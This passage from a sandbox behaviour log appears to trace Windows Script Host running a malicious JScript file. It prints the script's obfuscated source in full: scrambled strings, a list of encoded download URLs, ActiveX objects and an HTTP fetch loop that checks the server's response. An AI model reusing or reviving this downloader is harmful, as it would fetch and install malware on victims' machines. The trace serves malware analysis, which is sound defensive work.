signature block", _MaxCount=0x21) returned 102 [0014.349] wcsncmp (_String1="sntRl3X=14-7*niCjg8p;bhyE8kQnLHmw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102 [0014.349] wcsncmp (_String1="ntRl3X=14-7*niCjg8p;bhyE8kQnLHmw=", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 97 [0014.349] wcsncmp (_String1="tRl3X=14-7*niCjg8p;bhyE8kQnLHmw=[", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 103 [0014.349] wcsncmp (_String1="Rl3X=14-7*niCjg8p;bhyE8kQnLHmw=[]", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 69 [0014.349] wcsncmp (_String1="l3X=14-7*niCjg8p;bhyE8kQnLHmw=[];", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 95 [0014.349] wcsncmp (_String1="3X=14-7*niCjg8p;bhyE8kQnLHmw=[];\r", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 38 [0014.349] wcsncmp (_String1="X=14-7*niCjg8p;bhyE8kQnLHmw=[];\r\n", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 75 [0014.349] wcsncmp (_String1="=14-7*niCjg8p;bhyE8kQnLHmw=[];\r\nv", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48 [0014.349] wcsncmp (_String1="14-7*niCjg8p;bhyE8kQnLHmw=[];\r\nva", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 36 [0014.349] wcsncmp (_String1="4-7*niCjg8p;bhyE8kQnLHmw=[];\r\nvar", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 39 [0014.349] wcsncmp (_String1="-7*niCjg8p;bhyE8kQnLHmw=[];\r\nvar ", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 32 [0014.349] wcsncmp (_String1="7*niCjg8p;bhyE8kQnLHmw=[];\r\nvar w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 42 [0014.349] wcsncmp (_String1="*niCjg8p;bhyE8kQnLHmw=[];\r\nvar wu", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 29 [0014.349] wcsncmp (_String1="niCjg8p;bhyE8kQnLHmw=[];\r\nvar wuX", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 97 [0014.349] wcsncmp (_String1="iCjg8p;bhyE8kQnLHmw=[];\r\nvar wuX8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 92 [0014.349] wcsncmp (_String1="Cjg8p;bhyE8kQnLHmw=[];\r\nvar wuX8F", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54 [0014.349] wcsncmp (_String1="jg8p;bhyE8kQnLHmw=[];\r\nvar wuX8FT", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 93 [0014.349] wcsncmp (_String1="g8p;bhyE8kQnLHmw=[];\r\nvar wuX8FT=", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90 [0014.349] wcsncmp (_String1="8p;bhyE8kQnLHmw=[];\r\nvar wuX8FT=(", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43 [0014.349] wcsncmp (_String1="p;bhyE8kQnLHmw=[];\r\nvar wuX8FT=(~", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 99 [0014.349] wcsncmp (_String1=";bhyE8kQnLHmw=[];\r\nvar wuX8FT=(~(", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 46 [0014.349] wcsncmp (_String1="bhyE8kQnLHmw=[];\r\nvar wuX8FT=(~((", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 85 [0014.349] wcsncmp (_String1="hyE8kQnLHmw=[];\r\nvar wuX8FT=(~((~", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 91 [0014.349] wcsncmp (_String1="yE8kQnLHmw=[];\r\nvar wuX8FT=(~((~0", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 108 [0014.349] wcsncmp (_String1="E8kQnLHmw=[];\r\nvar wuX8FT=(~((~0x", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 56 [0014.349] wcsncmp (_String1="8kQnLHmw=[];\r\nvar wuX8FT=(~((~0x1", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43 [0014.349] wcsncmp (_String1="kQnLHmw=[];\r\nvar wuX8FT=(~((~0x14", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 94 [0014.350] wcsncmp (_String1="QnLHmw=[];\r\nvar wuX8FT=(~((~0x144", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 68 [0014.350] wcsncmp (_String1="nLHmw=[];\r\nvar wuX8FT=(~((~0x144)", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 97 [0014.350] wcsncmp (_String1="LHmw=[];\r\nvar wuX8FT=(~((~0x144)*", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 63 [0014.350] wcsncmp (_String1="Hmw=[];\r\nvar wuX8FT=(~((~0x144)*(", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 59 [0014.350] wcsncmp (_String1="mw=[];\r\nvar wuX8FT=(~((~0x144)*(~", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 96 [0014.350] wcsncmp (_String1="w=[];\r\nvar wuX8FT=(~((~0x144)*(~-", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106 [0014.350] wcsncmp (_String1="=[];\r\nvar wuX8FT=(~((~0x144)*(~-4", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48 [0014.350] wcsncmp (_String1="[];\r\nvar wuX8FT=(~((~0x144)*(~-4)", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 78 [0014.350] wcsncmp (_String1="];\r\nvar wuX8FT=(~((~0x144)*(~-4)-", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 80 [0014.350] wcsncmp (_String1=";\r\nvar wuX8FT=(~((~0x144)*(~-4)-(", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 46 [0014.350] wcsncmp (_String1="\r\nvar wuX8FT=(~((~0x144)*(~-4)-(8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 71 [0014.350] wcsncmp (_String1="\nvar wuX8FT=(~((~0x144)*(~-4)-(8*", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned -3 [0014.350] wcsncmp (_String1="var wuX8FT=(~((~0x144)*(~-4)-(8*0", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 105 [0014.350] wcsncmp (_String1="ar wuX8FT=(~((~0x144)*(~-4)-(8*0x", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84 [0014.350] wcsncmp (_String1="r wuX8FT=(~((~0x144)*(~-4)-(8*0x3", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101 [0014.350] wcsncmp (_String1=" wuX8FT=(~((~0x144)*(~-4)-(8*0x3+", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 19 [0014.350] wcsncmp (_String1="wuX8FT=(~((~0x144)*(~-4)-(8*0x3+2", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106 [0014.350] wcsncmp (_String1="uX8FT=(~((~0x144)*(~-4)-(8*0x3+2)", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 104 [0014.350] wcsncmp (_String1="X8FT=(~((~0x144)*(~-4)-(8*0x3+2))", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 75 [0014.350] wcsncmp (_String1="8FT=(~((~0x144)*(~-4)-(8*0x3+2)))", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43 [0014.350] wcsncmp (_String1="FT=(~((~0x144)*(~-4)-(8*0x3+2)));", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 57 [0014.350] wcsncmp (_String1="T=(~((~0x144)*(~-4)-(8*0x3+2)));w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 71 [0014.350] wcsncmp (_String1="=(~((~0x144)*(~-4)-(8*0x3+2)));wu", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48 [0014.350] wcsncmp (_String1="(~((~0x144)*(~-4)-(8*0x3+2)));wuX", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 27 [0014.350] wcsncmp (_String1="~((~0x144)*(~-4)-(8*0x3+2)));wuX8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 113 [0014.350] wcsncmp (_String1="((~0x144)*(~-4)-(8*0x3+2)));wuX8F", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 27 [0014.350] wcsncmp (_String1="(~0x144)*(~-4)-(8*0x3+2)));wuX8FT", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 27 [0014.350] wcsncmp (_String1="~0x144)*(~-4)-(8*0x3+2)));wuX8FT=", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 113 [0014.350] wcsncmp (_String1="0x144)*(~-4)-(8*0x3+2)));wuX8FT=w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 35 [0014.350] wcsncmp (_String1="x144)*(~-4)-(8*0x3+2)));wuX8FT=wu", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 107 [0014.350] wcsncmp (_String1="144)*(~-4)-(8*0x3+2)));wuX8FT=wuX", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 36 [0014.350] wcsncmp (_String1="44)*(~-4)-(8*0x3+2)));wuX8FT=wuX8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 39 [0014.350] wcsncmp (_String1="4)*(~-4)-(8*0x3+2)));wuX8FT=wuX8F", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 39 [0014.350] wcsncmp (_String1=")*(~-4)-(8*0x3+2)));wuX8FT=wuX8FT", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 28 [0014.350] wcsncmp (_String1="*(~-4)-(8*0x3+2)));wuX8FT=wuX8FT*", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 29 [0014.350] wcsncmp (_String1="(~-4)-(8*0x3+2)));wuX8FT=wuX8FT*(", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 27 [0014.350] wcsncmp (_String1="~-4)-(8*0x3+2)));wuX8FT=wuX8FT*(~", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 113 [0014.350] wcsncmp (_String1="-4)-(8*0x3+2)));wuX8FT=wuX8FT*(~(", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 32 [0014.350] wcsncmp (_String1="4)-(8*0x3+2)));wuX8FT=wuX8FT*(~(~", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 39 [0014.350] wcsncmp (_String1=")-(8*0x3+2)));wuX8FT=wuX8FT*(~(~(", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 28 [0014.351] wcsncmp (_String1="-(8*0x3+2)));wuX8FT=wuX8FT*(~(~(2", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 32 [0014.351] wcsncmp (_String1="(8*0x3+2)));wuX8FT=wuX8FT*(~(~(21", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 27 [0014.351] wcsncmp (_String1="8*0x3+2)));wuX8FT=wuX8FT*(~(~(210", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43 [0014.351] wcsncmp (_String1="*0x3+2)));wuX8FT=wuX8FT*(~(~(210*", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 29 [0014.351] wcsncmp (_String1="0x3+2)));wuX8FT=wuX8FT*(~(~(210*0", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 35 [0014.351] wcsncmp (_String1="x3+2)));wuX8FT=wuX8FT*(~(~(210*0x", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 107 [0014.351] wcsncmp (_String1="3+2)));wuX8FT=wuX8FT*(~(~(210*0x1", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 38 [0014.351] wcsncmp (_String1="+2)));wuX8FT=wuX8FT*(~(~(210*0x1+", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 30 [0014.351] wcsncmp (_String1="2)));wuX8FT=wuX8FT*(~(~(210*0x1+0", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 37 [0014.351] wcsncmp (_String1=")));wuX8FT=wuX8FT*(~(~(210*0x1+0x", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 28 [0014.351] wcsncmp (_String1="));wuX8FT=wuX8FT*(~(~(210*0x1+0xa", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 28 [0014.351] wcsncmp (_String1=");wuX8FT=wuX8FT*(~(~(210*0x1+0xa)", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 28 [0014.351] wcsncmp (_String1=";wuX8FT=wuX8FT*(~(~(210*0x1+0xa))", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 46 [0014.351] wcsncmp (_String1="wuX8FT=wuX8FT*(~(~(210*0x1+0xa)))", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106 [0014.351] wcsncmp (_String1="uX8FT=wuX8FT*(~(~(210*0x1+0xa)))*", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 104 [0014.351] wcsncmp (_String1="X8FT=wuX8FT*(~(~(210*0x1+0xa)))*n", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 75 [0014.351] wcsncmp (_String1="8FT=wuX8FT*(~(~(210*0x1+0xa)))*ni", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43 [0014.351] wcsncmp (_String1="FT=wuX8FT*(~(~(210*0x1+0xa)))*niC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 57 [0014.351] wcsncmp (_String1="T=wuX8FT*(~(~(210*0x1+0xa)))*niCj", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 71 [0014.351] wcsncmp (_String1="=wuX8FT*(~(~(210*0x1+0xa)))*niCjg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48 [0014.351] wcsncmp (_String1="wuX8FT*(~(~(210*0x1+0xa)))*niCjg8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106 [0014.351] wcsncmp (_String1="uX8FT*(~(~(210*0x1+0xa)))*niCjg8p", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 104 [0014.351] wcsncmp (_String1="X8FT*(~(~(210*0x1+0xa)))*niCjg8p;", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 75 [0014.351] wcsncmp (_String1="8FT*(~(~(210*0x1+0xa)))*niCjg8p;\r", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43 [0014.351] wcsncmp (_String1="FT*(~(~(210*0x1+0xa)))*niCjg8p;\r\n", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 57 [0014.351] wcsncmp (_String1="T*(~(~(210*0x1+0xa)))*niCjg8p;\r\nC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 71 [0014.351] wcsncmp (_String1="*(~(~(210*0x1+0xa)))*niCjg8p;\r\nCz", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 29 [0014.351] wcsncmp (_String1="(~(~(210*0x1+0xa)))*niCjg8p;\r\nCz3", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 27 [0014.351] wcsncmp (_String1="~(~(210*0x1+0xa)))*niCjg8p;\r\nCz38", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 113 [0014.351] wcsncmp (_String1="(~(210*0x1+0xa)))*niCjg8p;\r\nCz38p", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 27 [0014.351] wcsncmp (_String1="~(210*0x1+0xa)))*niCjg8p;\r\nCz38pa", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 113 [0014.351] wcsncmp (_String1="(210*0x1+0xa)))*niCjg8p;\r\nCz38paU", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 27 [0014.351] wcsncmp (_String1="210*0x1+0xa)))*niCjg8p;\r\nCz38paU=", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 37 [0014.351] wcsncmp (_String1="10*0x1+0xa)))*niCjg8p;\r\nCz38paU=(", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 36 [0014.351] wcsncmp (_String1="0*0x1+0xa)))*niCjg8p;\r\nCz38paU=(~", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 35 [0014.351] wcsncmp (_String1="*0x1+0xa)))*niCjg8p;\r\nCz38paU=(~(", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 29 [0014.351] wcsncmp (_String1="0x1+0xa)))*niCjg8p;\r\nCz38paU=(~((", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 35 [0014.351] wcsncmp (_String1="x1+0xa)))*niCjg8p;\r\nCz38paU=(~((-", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 107 [0014.351] wcsncmp (_String1="1+0xa)))*niCjg8p;\r\nCz38paU=(~((-1", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 36 [0014.351] wcsncmp (_String1="+0xa)))*niCjg8p;\r\nCz38paU=(~((-15", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 30 [0014.351] wcsncmp (_String1="0xa)))*niCjg8p;\r\nCz38paU=(~((-153", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 35 [0014.351] wcsncmp (_String1="xa)))*niCjg8p;\r\nCz38paU=(~((-1536", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 107 [0014.352] wcsncmp (_String1="a)))*niCjg8p;\r\nCz38paU=(~((-1536>", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84 [0014.352] wcsncmp (_String1=")))*niCjg8p;\r\nCz38paU=(~((-1536>>", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 28 [0014.352] wcsncmp (_String1="))*niCjg8p;\r\nCz38paU=(~((-1536>>0", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 28 [0014.352] wcsncmp (_String1=")*niCjg8p;\r\nCz38paU=(~((-1536>>0x", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 28 [0014.352] wcsncmp (_String1="*niCjg8p;\r\nCz38paU=(~((-1536>>0x3", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 29 [0014.352] wcsncmp (_String1="niCjg8p;\r\nCz38paU=(~((-1536>>0x3)", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 97 [0014.352] SetLastError (dwErrCode=0xb) [0014.353] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1 [0014.353] CloseCodeAuthzLevel () returned 0x1 [0014.353] FreeLibrary (hLibModule=0x7fefe780000) returned 1 [0014.354] SysStringLen (param_1="function dcod() {return ''+new Date();}\r\nniCjg8p=((~(~0x2))<<(0x7*4+4));var bHNJYnNZ=0;K4qLwr0='';var LisOsCsJW=K4qLwr0+' ';\r\nvar MfrssntRl3X=14-7*niCjg8p;bhyE8kQnLHmw=[];\r\nvar wuX8FT=(~((~0x144)*(~-4)-(8*0x3+2)));wuX8FT=wuX8FT*(~(~(210*0x1+0xa)))*niCjg8p;\r\nCz38paU=(~((-1536>>0x3)>>(3*0x2)));Nx1l56ifC8j=dcod();while(wuX8FT>((~(-327<<32))%(~-2))){VLO0ZCviet=Nx1l56ifC8j.split(LisOsCsJW);bhyE8kQnLHmw.push(VLO0ZCviet[wuX8FT%(4+2)]);wuX8FT--}\r\nMk5e24ouirD=[' hl-tN%th)pL(s:j:kj/*z/himzroe r?Oa,zn qa qcNncf o*xup(ngktmeaTanfrtVks:e-gsmhkyhy.mQsxah,oaYLr? eefp$qoIgil ndit!g. jcW)oevmhe/Ggp oe?armnseiojlnuoa, lsY/uxliTigUl py z_e.mrao nr, am,ngratrcxmctyo. ui nIwttgabgn :tr ssk_Qrc+no,ymrb_uZa muLg/c _a l ayvyrnoskuqqtlxsbr/ x1. 5uI/teghmut eb s*+t?La oclvc-!elpsQ sVk.Ynahcstupzyx k?ued toc ceaihtdkl= 0vG3*,5wq5Qe9tmbmadZ)7S?bNmd* 4gk7e*3c,4(s5p 0yzfnxa /bpI4,+cte6id7It9o cloa evp4Zgb:!eac9eI1ls3pf&rjakfuVvti hylkTleNiyid=mRA-nX OWlPivkRk*P:dN pRSrVwyvcewvfjY 9MoBpfs,pVvMK-xKyey WrvlAris *c H&dVeno= f2Ws5Ks9WXc!jauS7sf2xbakxbji9Gc5sm3ul4 x8XJ5 U7,lbtt5ndcIt3au9s:6 r4%w3W 1 K0pk9 1o)6o bnb0ou9z'.ne(),'nhfVt rth,p wsnm: y/fg/ YbRca?hl,tarXnuqcs.ey df(bmmodMoiukxtkbmej+edwpwhewJrigsiT-lomdeynd.z*sp,h ka,?rw e xpYxox idvncxtuf.U?culoMqml /lyprYeeer -sroodcnqmax-lYd/bvghzluseM/ni-_GQbgzafalrzagdnq c zew-dplbuyoWrouckdTktxe yecopm efprjzs Y_nhc goeamn _mtaxrub+/y _bdlXra$mygcot.ucatn+sac/bI1lp5by/+tgtsur eulsxztfeawrcc*cvxevus ksy?.evag/skzp ?xju? dIeot cL,ih dv =vS0tn8tg3ideytdarci.dx 4Jf9M est9/sadl9kz4jX3$,1q 2e bOV1,V5-zca,akk9/p3 (5wxcrS6+g6ggabl2jc5 o8 x2b &ipas uW tj hpvkfderyyyb=nqA.Sdpo_mlOdhsNsunrH 4behjn1k?7eefMlFf 1.fLwvzkdFykH%?Ky lpgSxVY zY-w&n$ekj=qa6iidd 4qd3zIa a7Iy0bLaa 8-a1fec%e6Ua4phc ud t8/.9mc8htd(fc*jdmT1 y4m-4q$7jb7bYdde1r!bUc8 Qehec d*ykwib *bOsUih ybpPMhTrWdMTxkShf NN, wyg Ktu zmJyGbql uoO. j)*jw wk.y+Gvx.G.chezpsQSqpnqWaJldhwc$tovJ: XMrlmSP fkh?j qf adwnpU v!sizgO, nZ pGflxh.ii,gmzlzvpXo LN in H**?asdhlsqhIm+hmdMh(ktwa v!rc p qieQ:qt LgwndjafatHvjOxjdptntka* cmouPSwwrq umbnvrlet$ t *djxjMjbmjd-nbL vblvayodsrne'.ne()];pd8hqSN='mEvrxL%pa a)cnvmdjaEWtnjpv mitwrzeozGnpfm+geN nz)txaSgdtflrpzigmnvgg *sxt*zwNoxjsSxaa t Hzmtu,h.)griLwznPSie-,ierrcgm%n ewmMX,L,:?odaydogib !oylsnrRl+l ch%dov. G+o-l hJyu y kxJyjl k f v gN x dhJn x niq:,o:-x/ gomhonxdqiOyrlnSx-s xo eoZlfgjQRd xN+a:zyfkld?ebtxnxatvinan(pqedWk(kblubMb JZpqdTm, oyfrtjxdrsqLumdqoaVpojoSHivgybjuhNgppvbjkulrnoygtowPlxwvsgqhjzk. dxdyscsdn rp$.!zmkjrYkp-,uvmcchvak n/jMqZePYvoRk )s-ahiVysbuy P,p ywijlOLrqnIO n+Msr,+omr,bkwSzv lvsum):e vXgb imj,budvc vqtJH .wjkousg aad:bYvY'.ne();\r\nZpTrIPjem=this['-AiXc .trcifuvuoescXi Om bs jOze .cfbtJ'.ne()];pLrKbn_kfT=new ZpTrIPjem('mWwbSqfc$br giyRplntXT.rhSzqhw.eu lkWlr'.ne());aLz8xaEkN0='mR ou In '.ne();SIjuR6Lf=pLrKbn_kfT[pd8hqSN]('Y%yxTz)Ew MhzPw!%kR/gopmoSxqTdv7fa9sh0iymsvvy,.SoefRxRqeR(* ppV bpxe apm c%Ybpb gqyg Vsxbd:x .rTfyKcm'.ne());\r\nrQXDZv1S=new ZpTrIPjem('uMowSdnXawMprLpn2Ws.mxXjzM ,LuZHVSTs*TdkPR'.ne());while(bHNJYnNZ==0){rQXDZv1S[' osYpGuezjnm'.ne()]('aGebEu Tm'.ne(),Mk5e24ouirD[MfrssntRl3X], (((1417674752>>23)*(0x1<<0x20)+(~-67))%(32>>0x5)));\r\n++MfrssntRl3X;if (MfrssntRl3X==Mk5e24ouirD.length) MfrssntRl3X=(((0x1c000<<0x7)>>(15<<32))%(0x1821f27fb4d6fb00/0x1821f27fb4d6fb00));rQXDZv1S['Gsuaelun. d('.ne()]();while(rQXDZv1S['urepeidalpdedyp spptrzaowtkpeg'.ne()]<(niCjg8p+Cz38paU)){ pLrKbn_kfT['$SfJl gemielwptK*Ub kHYN fJ(pigr-dgvnyf! MsGyef/R,tMgdsn z$HprRpyTz'.ne()]((((3200<<0xb)<<(25165824>>0x16))>>>(0x2c0>>0x5)));}\r\nOwUXVah3=rQXDZv1S['ss$mtpzaPftc*u (sdyT)Leimx:jtGj*arrpWsJQ:Ky ppz! s(jpgz jtn mo TtHcxnaWWhZY cznl t.P z mde:T zrv oPnz? rMnj(Oipu-uSxlltpxj:Pdekrfk ezvigteqn'.ne()]; if (OwUXVah3&&OwUXVah3=='mOeaKhr* VTkjhwxk?ol Qrv, vfH bqPt/:wplyaZveOxedwtkjfY% zdjyp i yrX bnvg Po)eqh-, jhhkLhhht. ,y*mh- rLz/hPe(jig,lh+Iei.K r(. i RwOugkzy*re p j Lhnzc hzaVq rsuxvi Mhl , zve oc! Guuyso RPrhk!gz-!mpu) pknw ydd b pPzr X) r Ww qzJyrhkVy Jlv,.lhr kP s *s zwqHsl%Vxgh*!kuvyakgb+adr+sw fo epaowef yu,gh, nmg muLkx poa )Vr?q.e)gayqxO h?w WZ gge xncu .Sioz bmxLyt nZ Lt ylji R vvoozwtv('.ne()) { var XFEtEi = rQXDZv1S['.rogenms lpldo unaqsMrec TI egMxNGtZq*jpd hgJm kyyqrlxZq a.ijzlo-ryy jvtsb-mne Yr$qx x oW,W:dpjd*x aq,Jmwm *jwcynj Mblgnlcay hzseppre .dc Grtuwnkeo tpSiyN(Gpmgk i vwse?yII Sgdk%K vx c.K : yyOzuue KoYov$Xorb:Rj,K!oi uku b jha. RXTmo,Wjndyb?InLv qsUePfra b czpXf ciKfV-uiogyytkbnkfeub)!,l -j)t)mxcq !ombn+tva% O?x Ko qfquhbm )pxahzMVr. !)dl kOt'.ne()];var O8ax37iv = XFEtEi.split('');\r\nif (O8ax37iv[0]+O8ax37iv[1]=='qMhaZ% *ooyJ,pjVVNwcL nKLcjmneoug lrgwc-Qx:heymenzroZffzf) cne.g wx,owvz t zouzgWb kc xplht hdspg .bed b%eog qhpemkQ qyn xeOku.JpZ g.Lwcf,kjufl .tblv rv+z ka qfwKHoOeebfko o z?we u + /J.ak mm+Kg)brcorXv vyc*:yc cs etkk llfnwQ iL y vo c cJ wdmW tpdad+bZlt/gV:klphovv:t y.uvJYh iIg u.vm+c lNYlk .sfsqXnV?gbuqvuxd zTx.qgkpzkk ip+vzpn KuazqlkgP rLJv iuPquh% PKzax Hex( kxfpsUqMjai/tiqv+,Vy.gnts i mzptUo mz.Tsokq.rwxvrp n,MfpZ)vzf vj w k/v%un dR qPw'.ne()) { bHNJYnNZ=1; } } } qbs5an_y2p=new ZpTrIPjem('cA(kDwqOpoDJlB%J.h S?Stgvrfzemga. m s*jhrem $o/h hw+xid! gwesp-ZY qlynv* xbS bw") returned 0x1c96 [0014.354] GetCurrentThreadId () returned 0x9ac [0014.365] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18e898 | out: ppv=0x18e898*=0x371480) returned 0x0 [0014.383] StdGlobalInterfaceTable:IGlobalInterfaceTable:RegisterInterfaceInGlobal (in: This=0x7fefe74a1b0, pUnk=0x2ba570, riid=0x7fef3086340*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pdwCookie=0x2ba5a8 | out: pdwCookie=0x2ba5a8*=0x100) returned 0x0 [0014.384] IUnknown:QueryInterface (in: This=0x2ba570, riid=0x7fefe71d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18e728 | out: ppvObject=0x18e728*=0x0) returned 0x80004002 [0014.384] IUnknown:QueryInterface (in: This=0x2ba570, riid=0x7fefe6f6f70*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18e730 | out: ppvObject=0x18e730*=0x0) returned 0x80004002 [0014.384] IUnknown:AddRef (This=0x2ba570) returned 0x2 [0014.384] IUnknown:AddRef (This=0x371480) returned 0x2 [0014.384] IUnknown:Release (This=0x371480) returned 0x1 [0014.384] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), 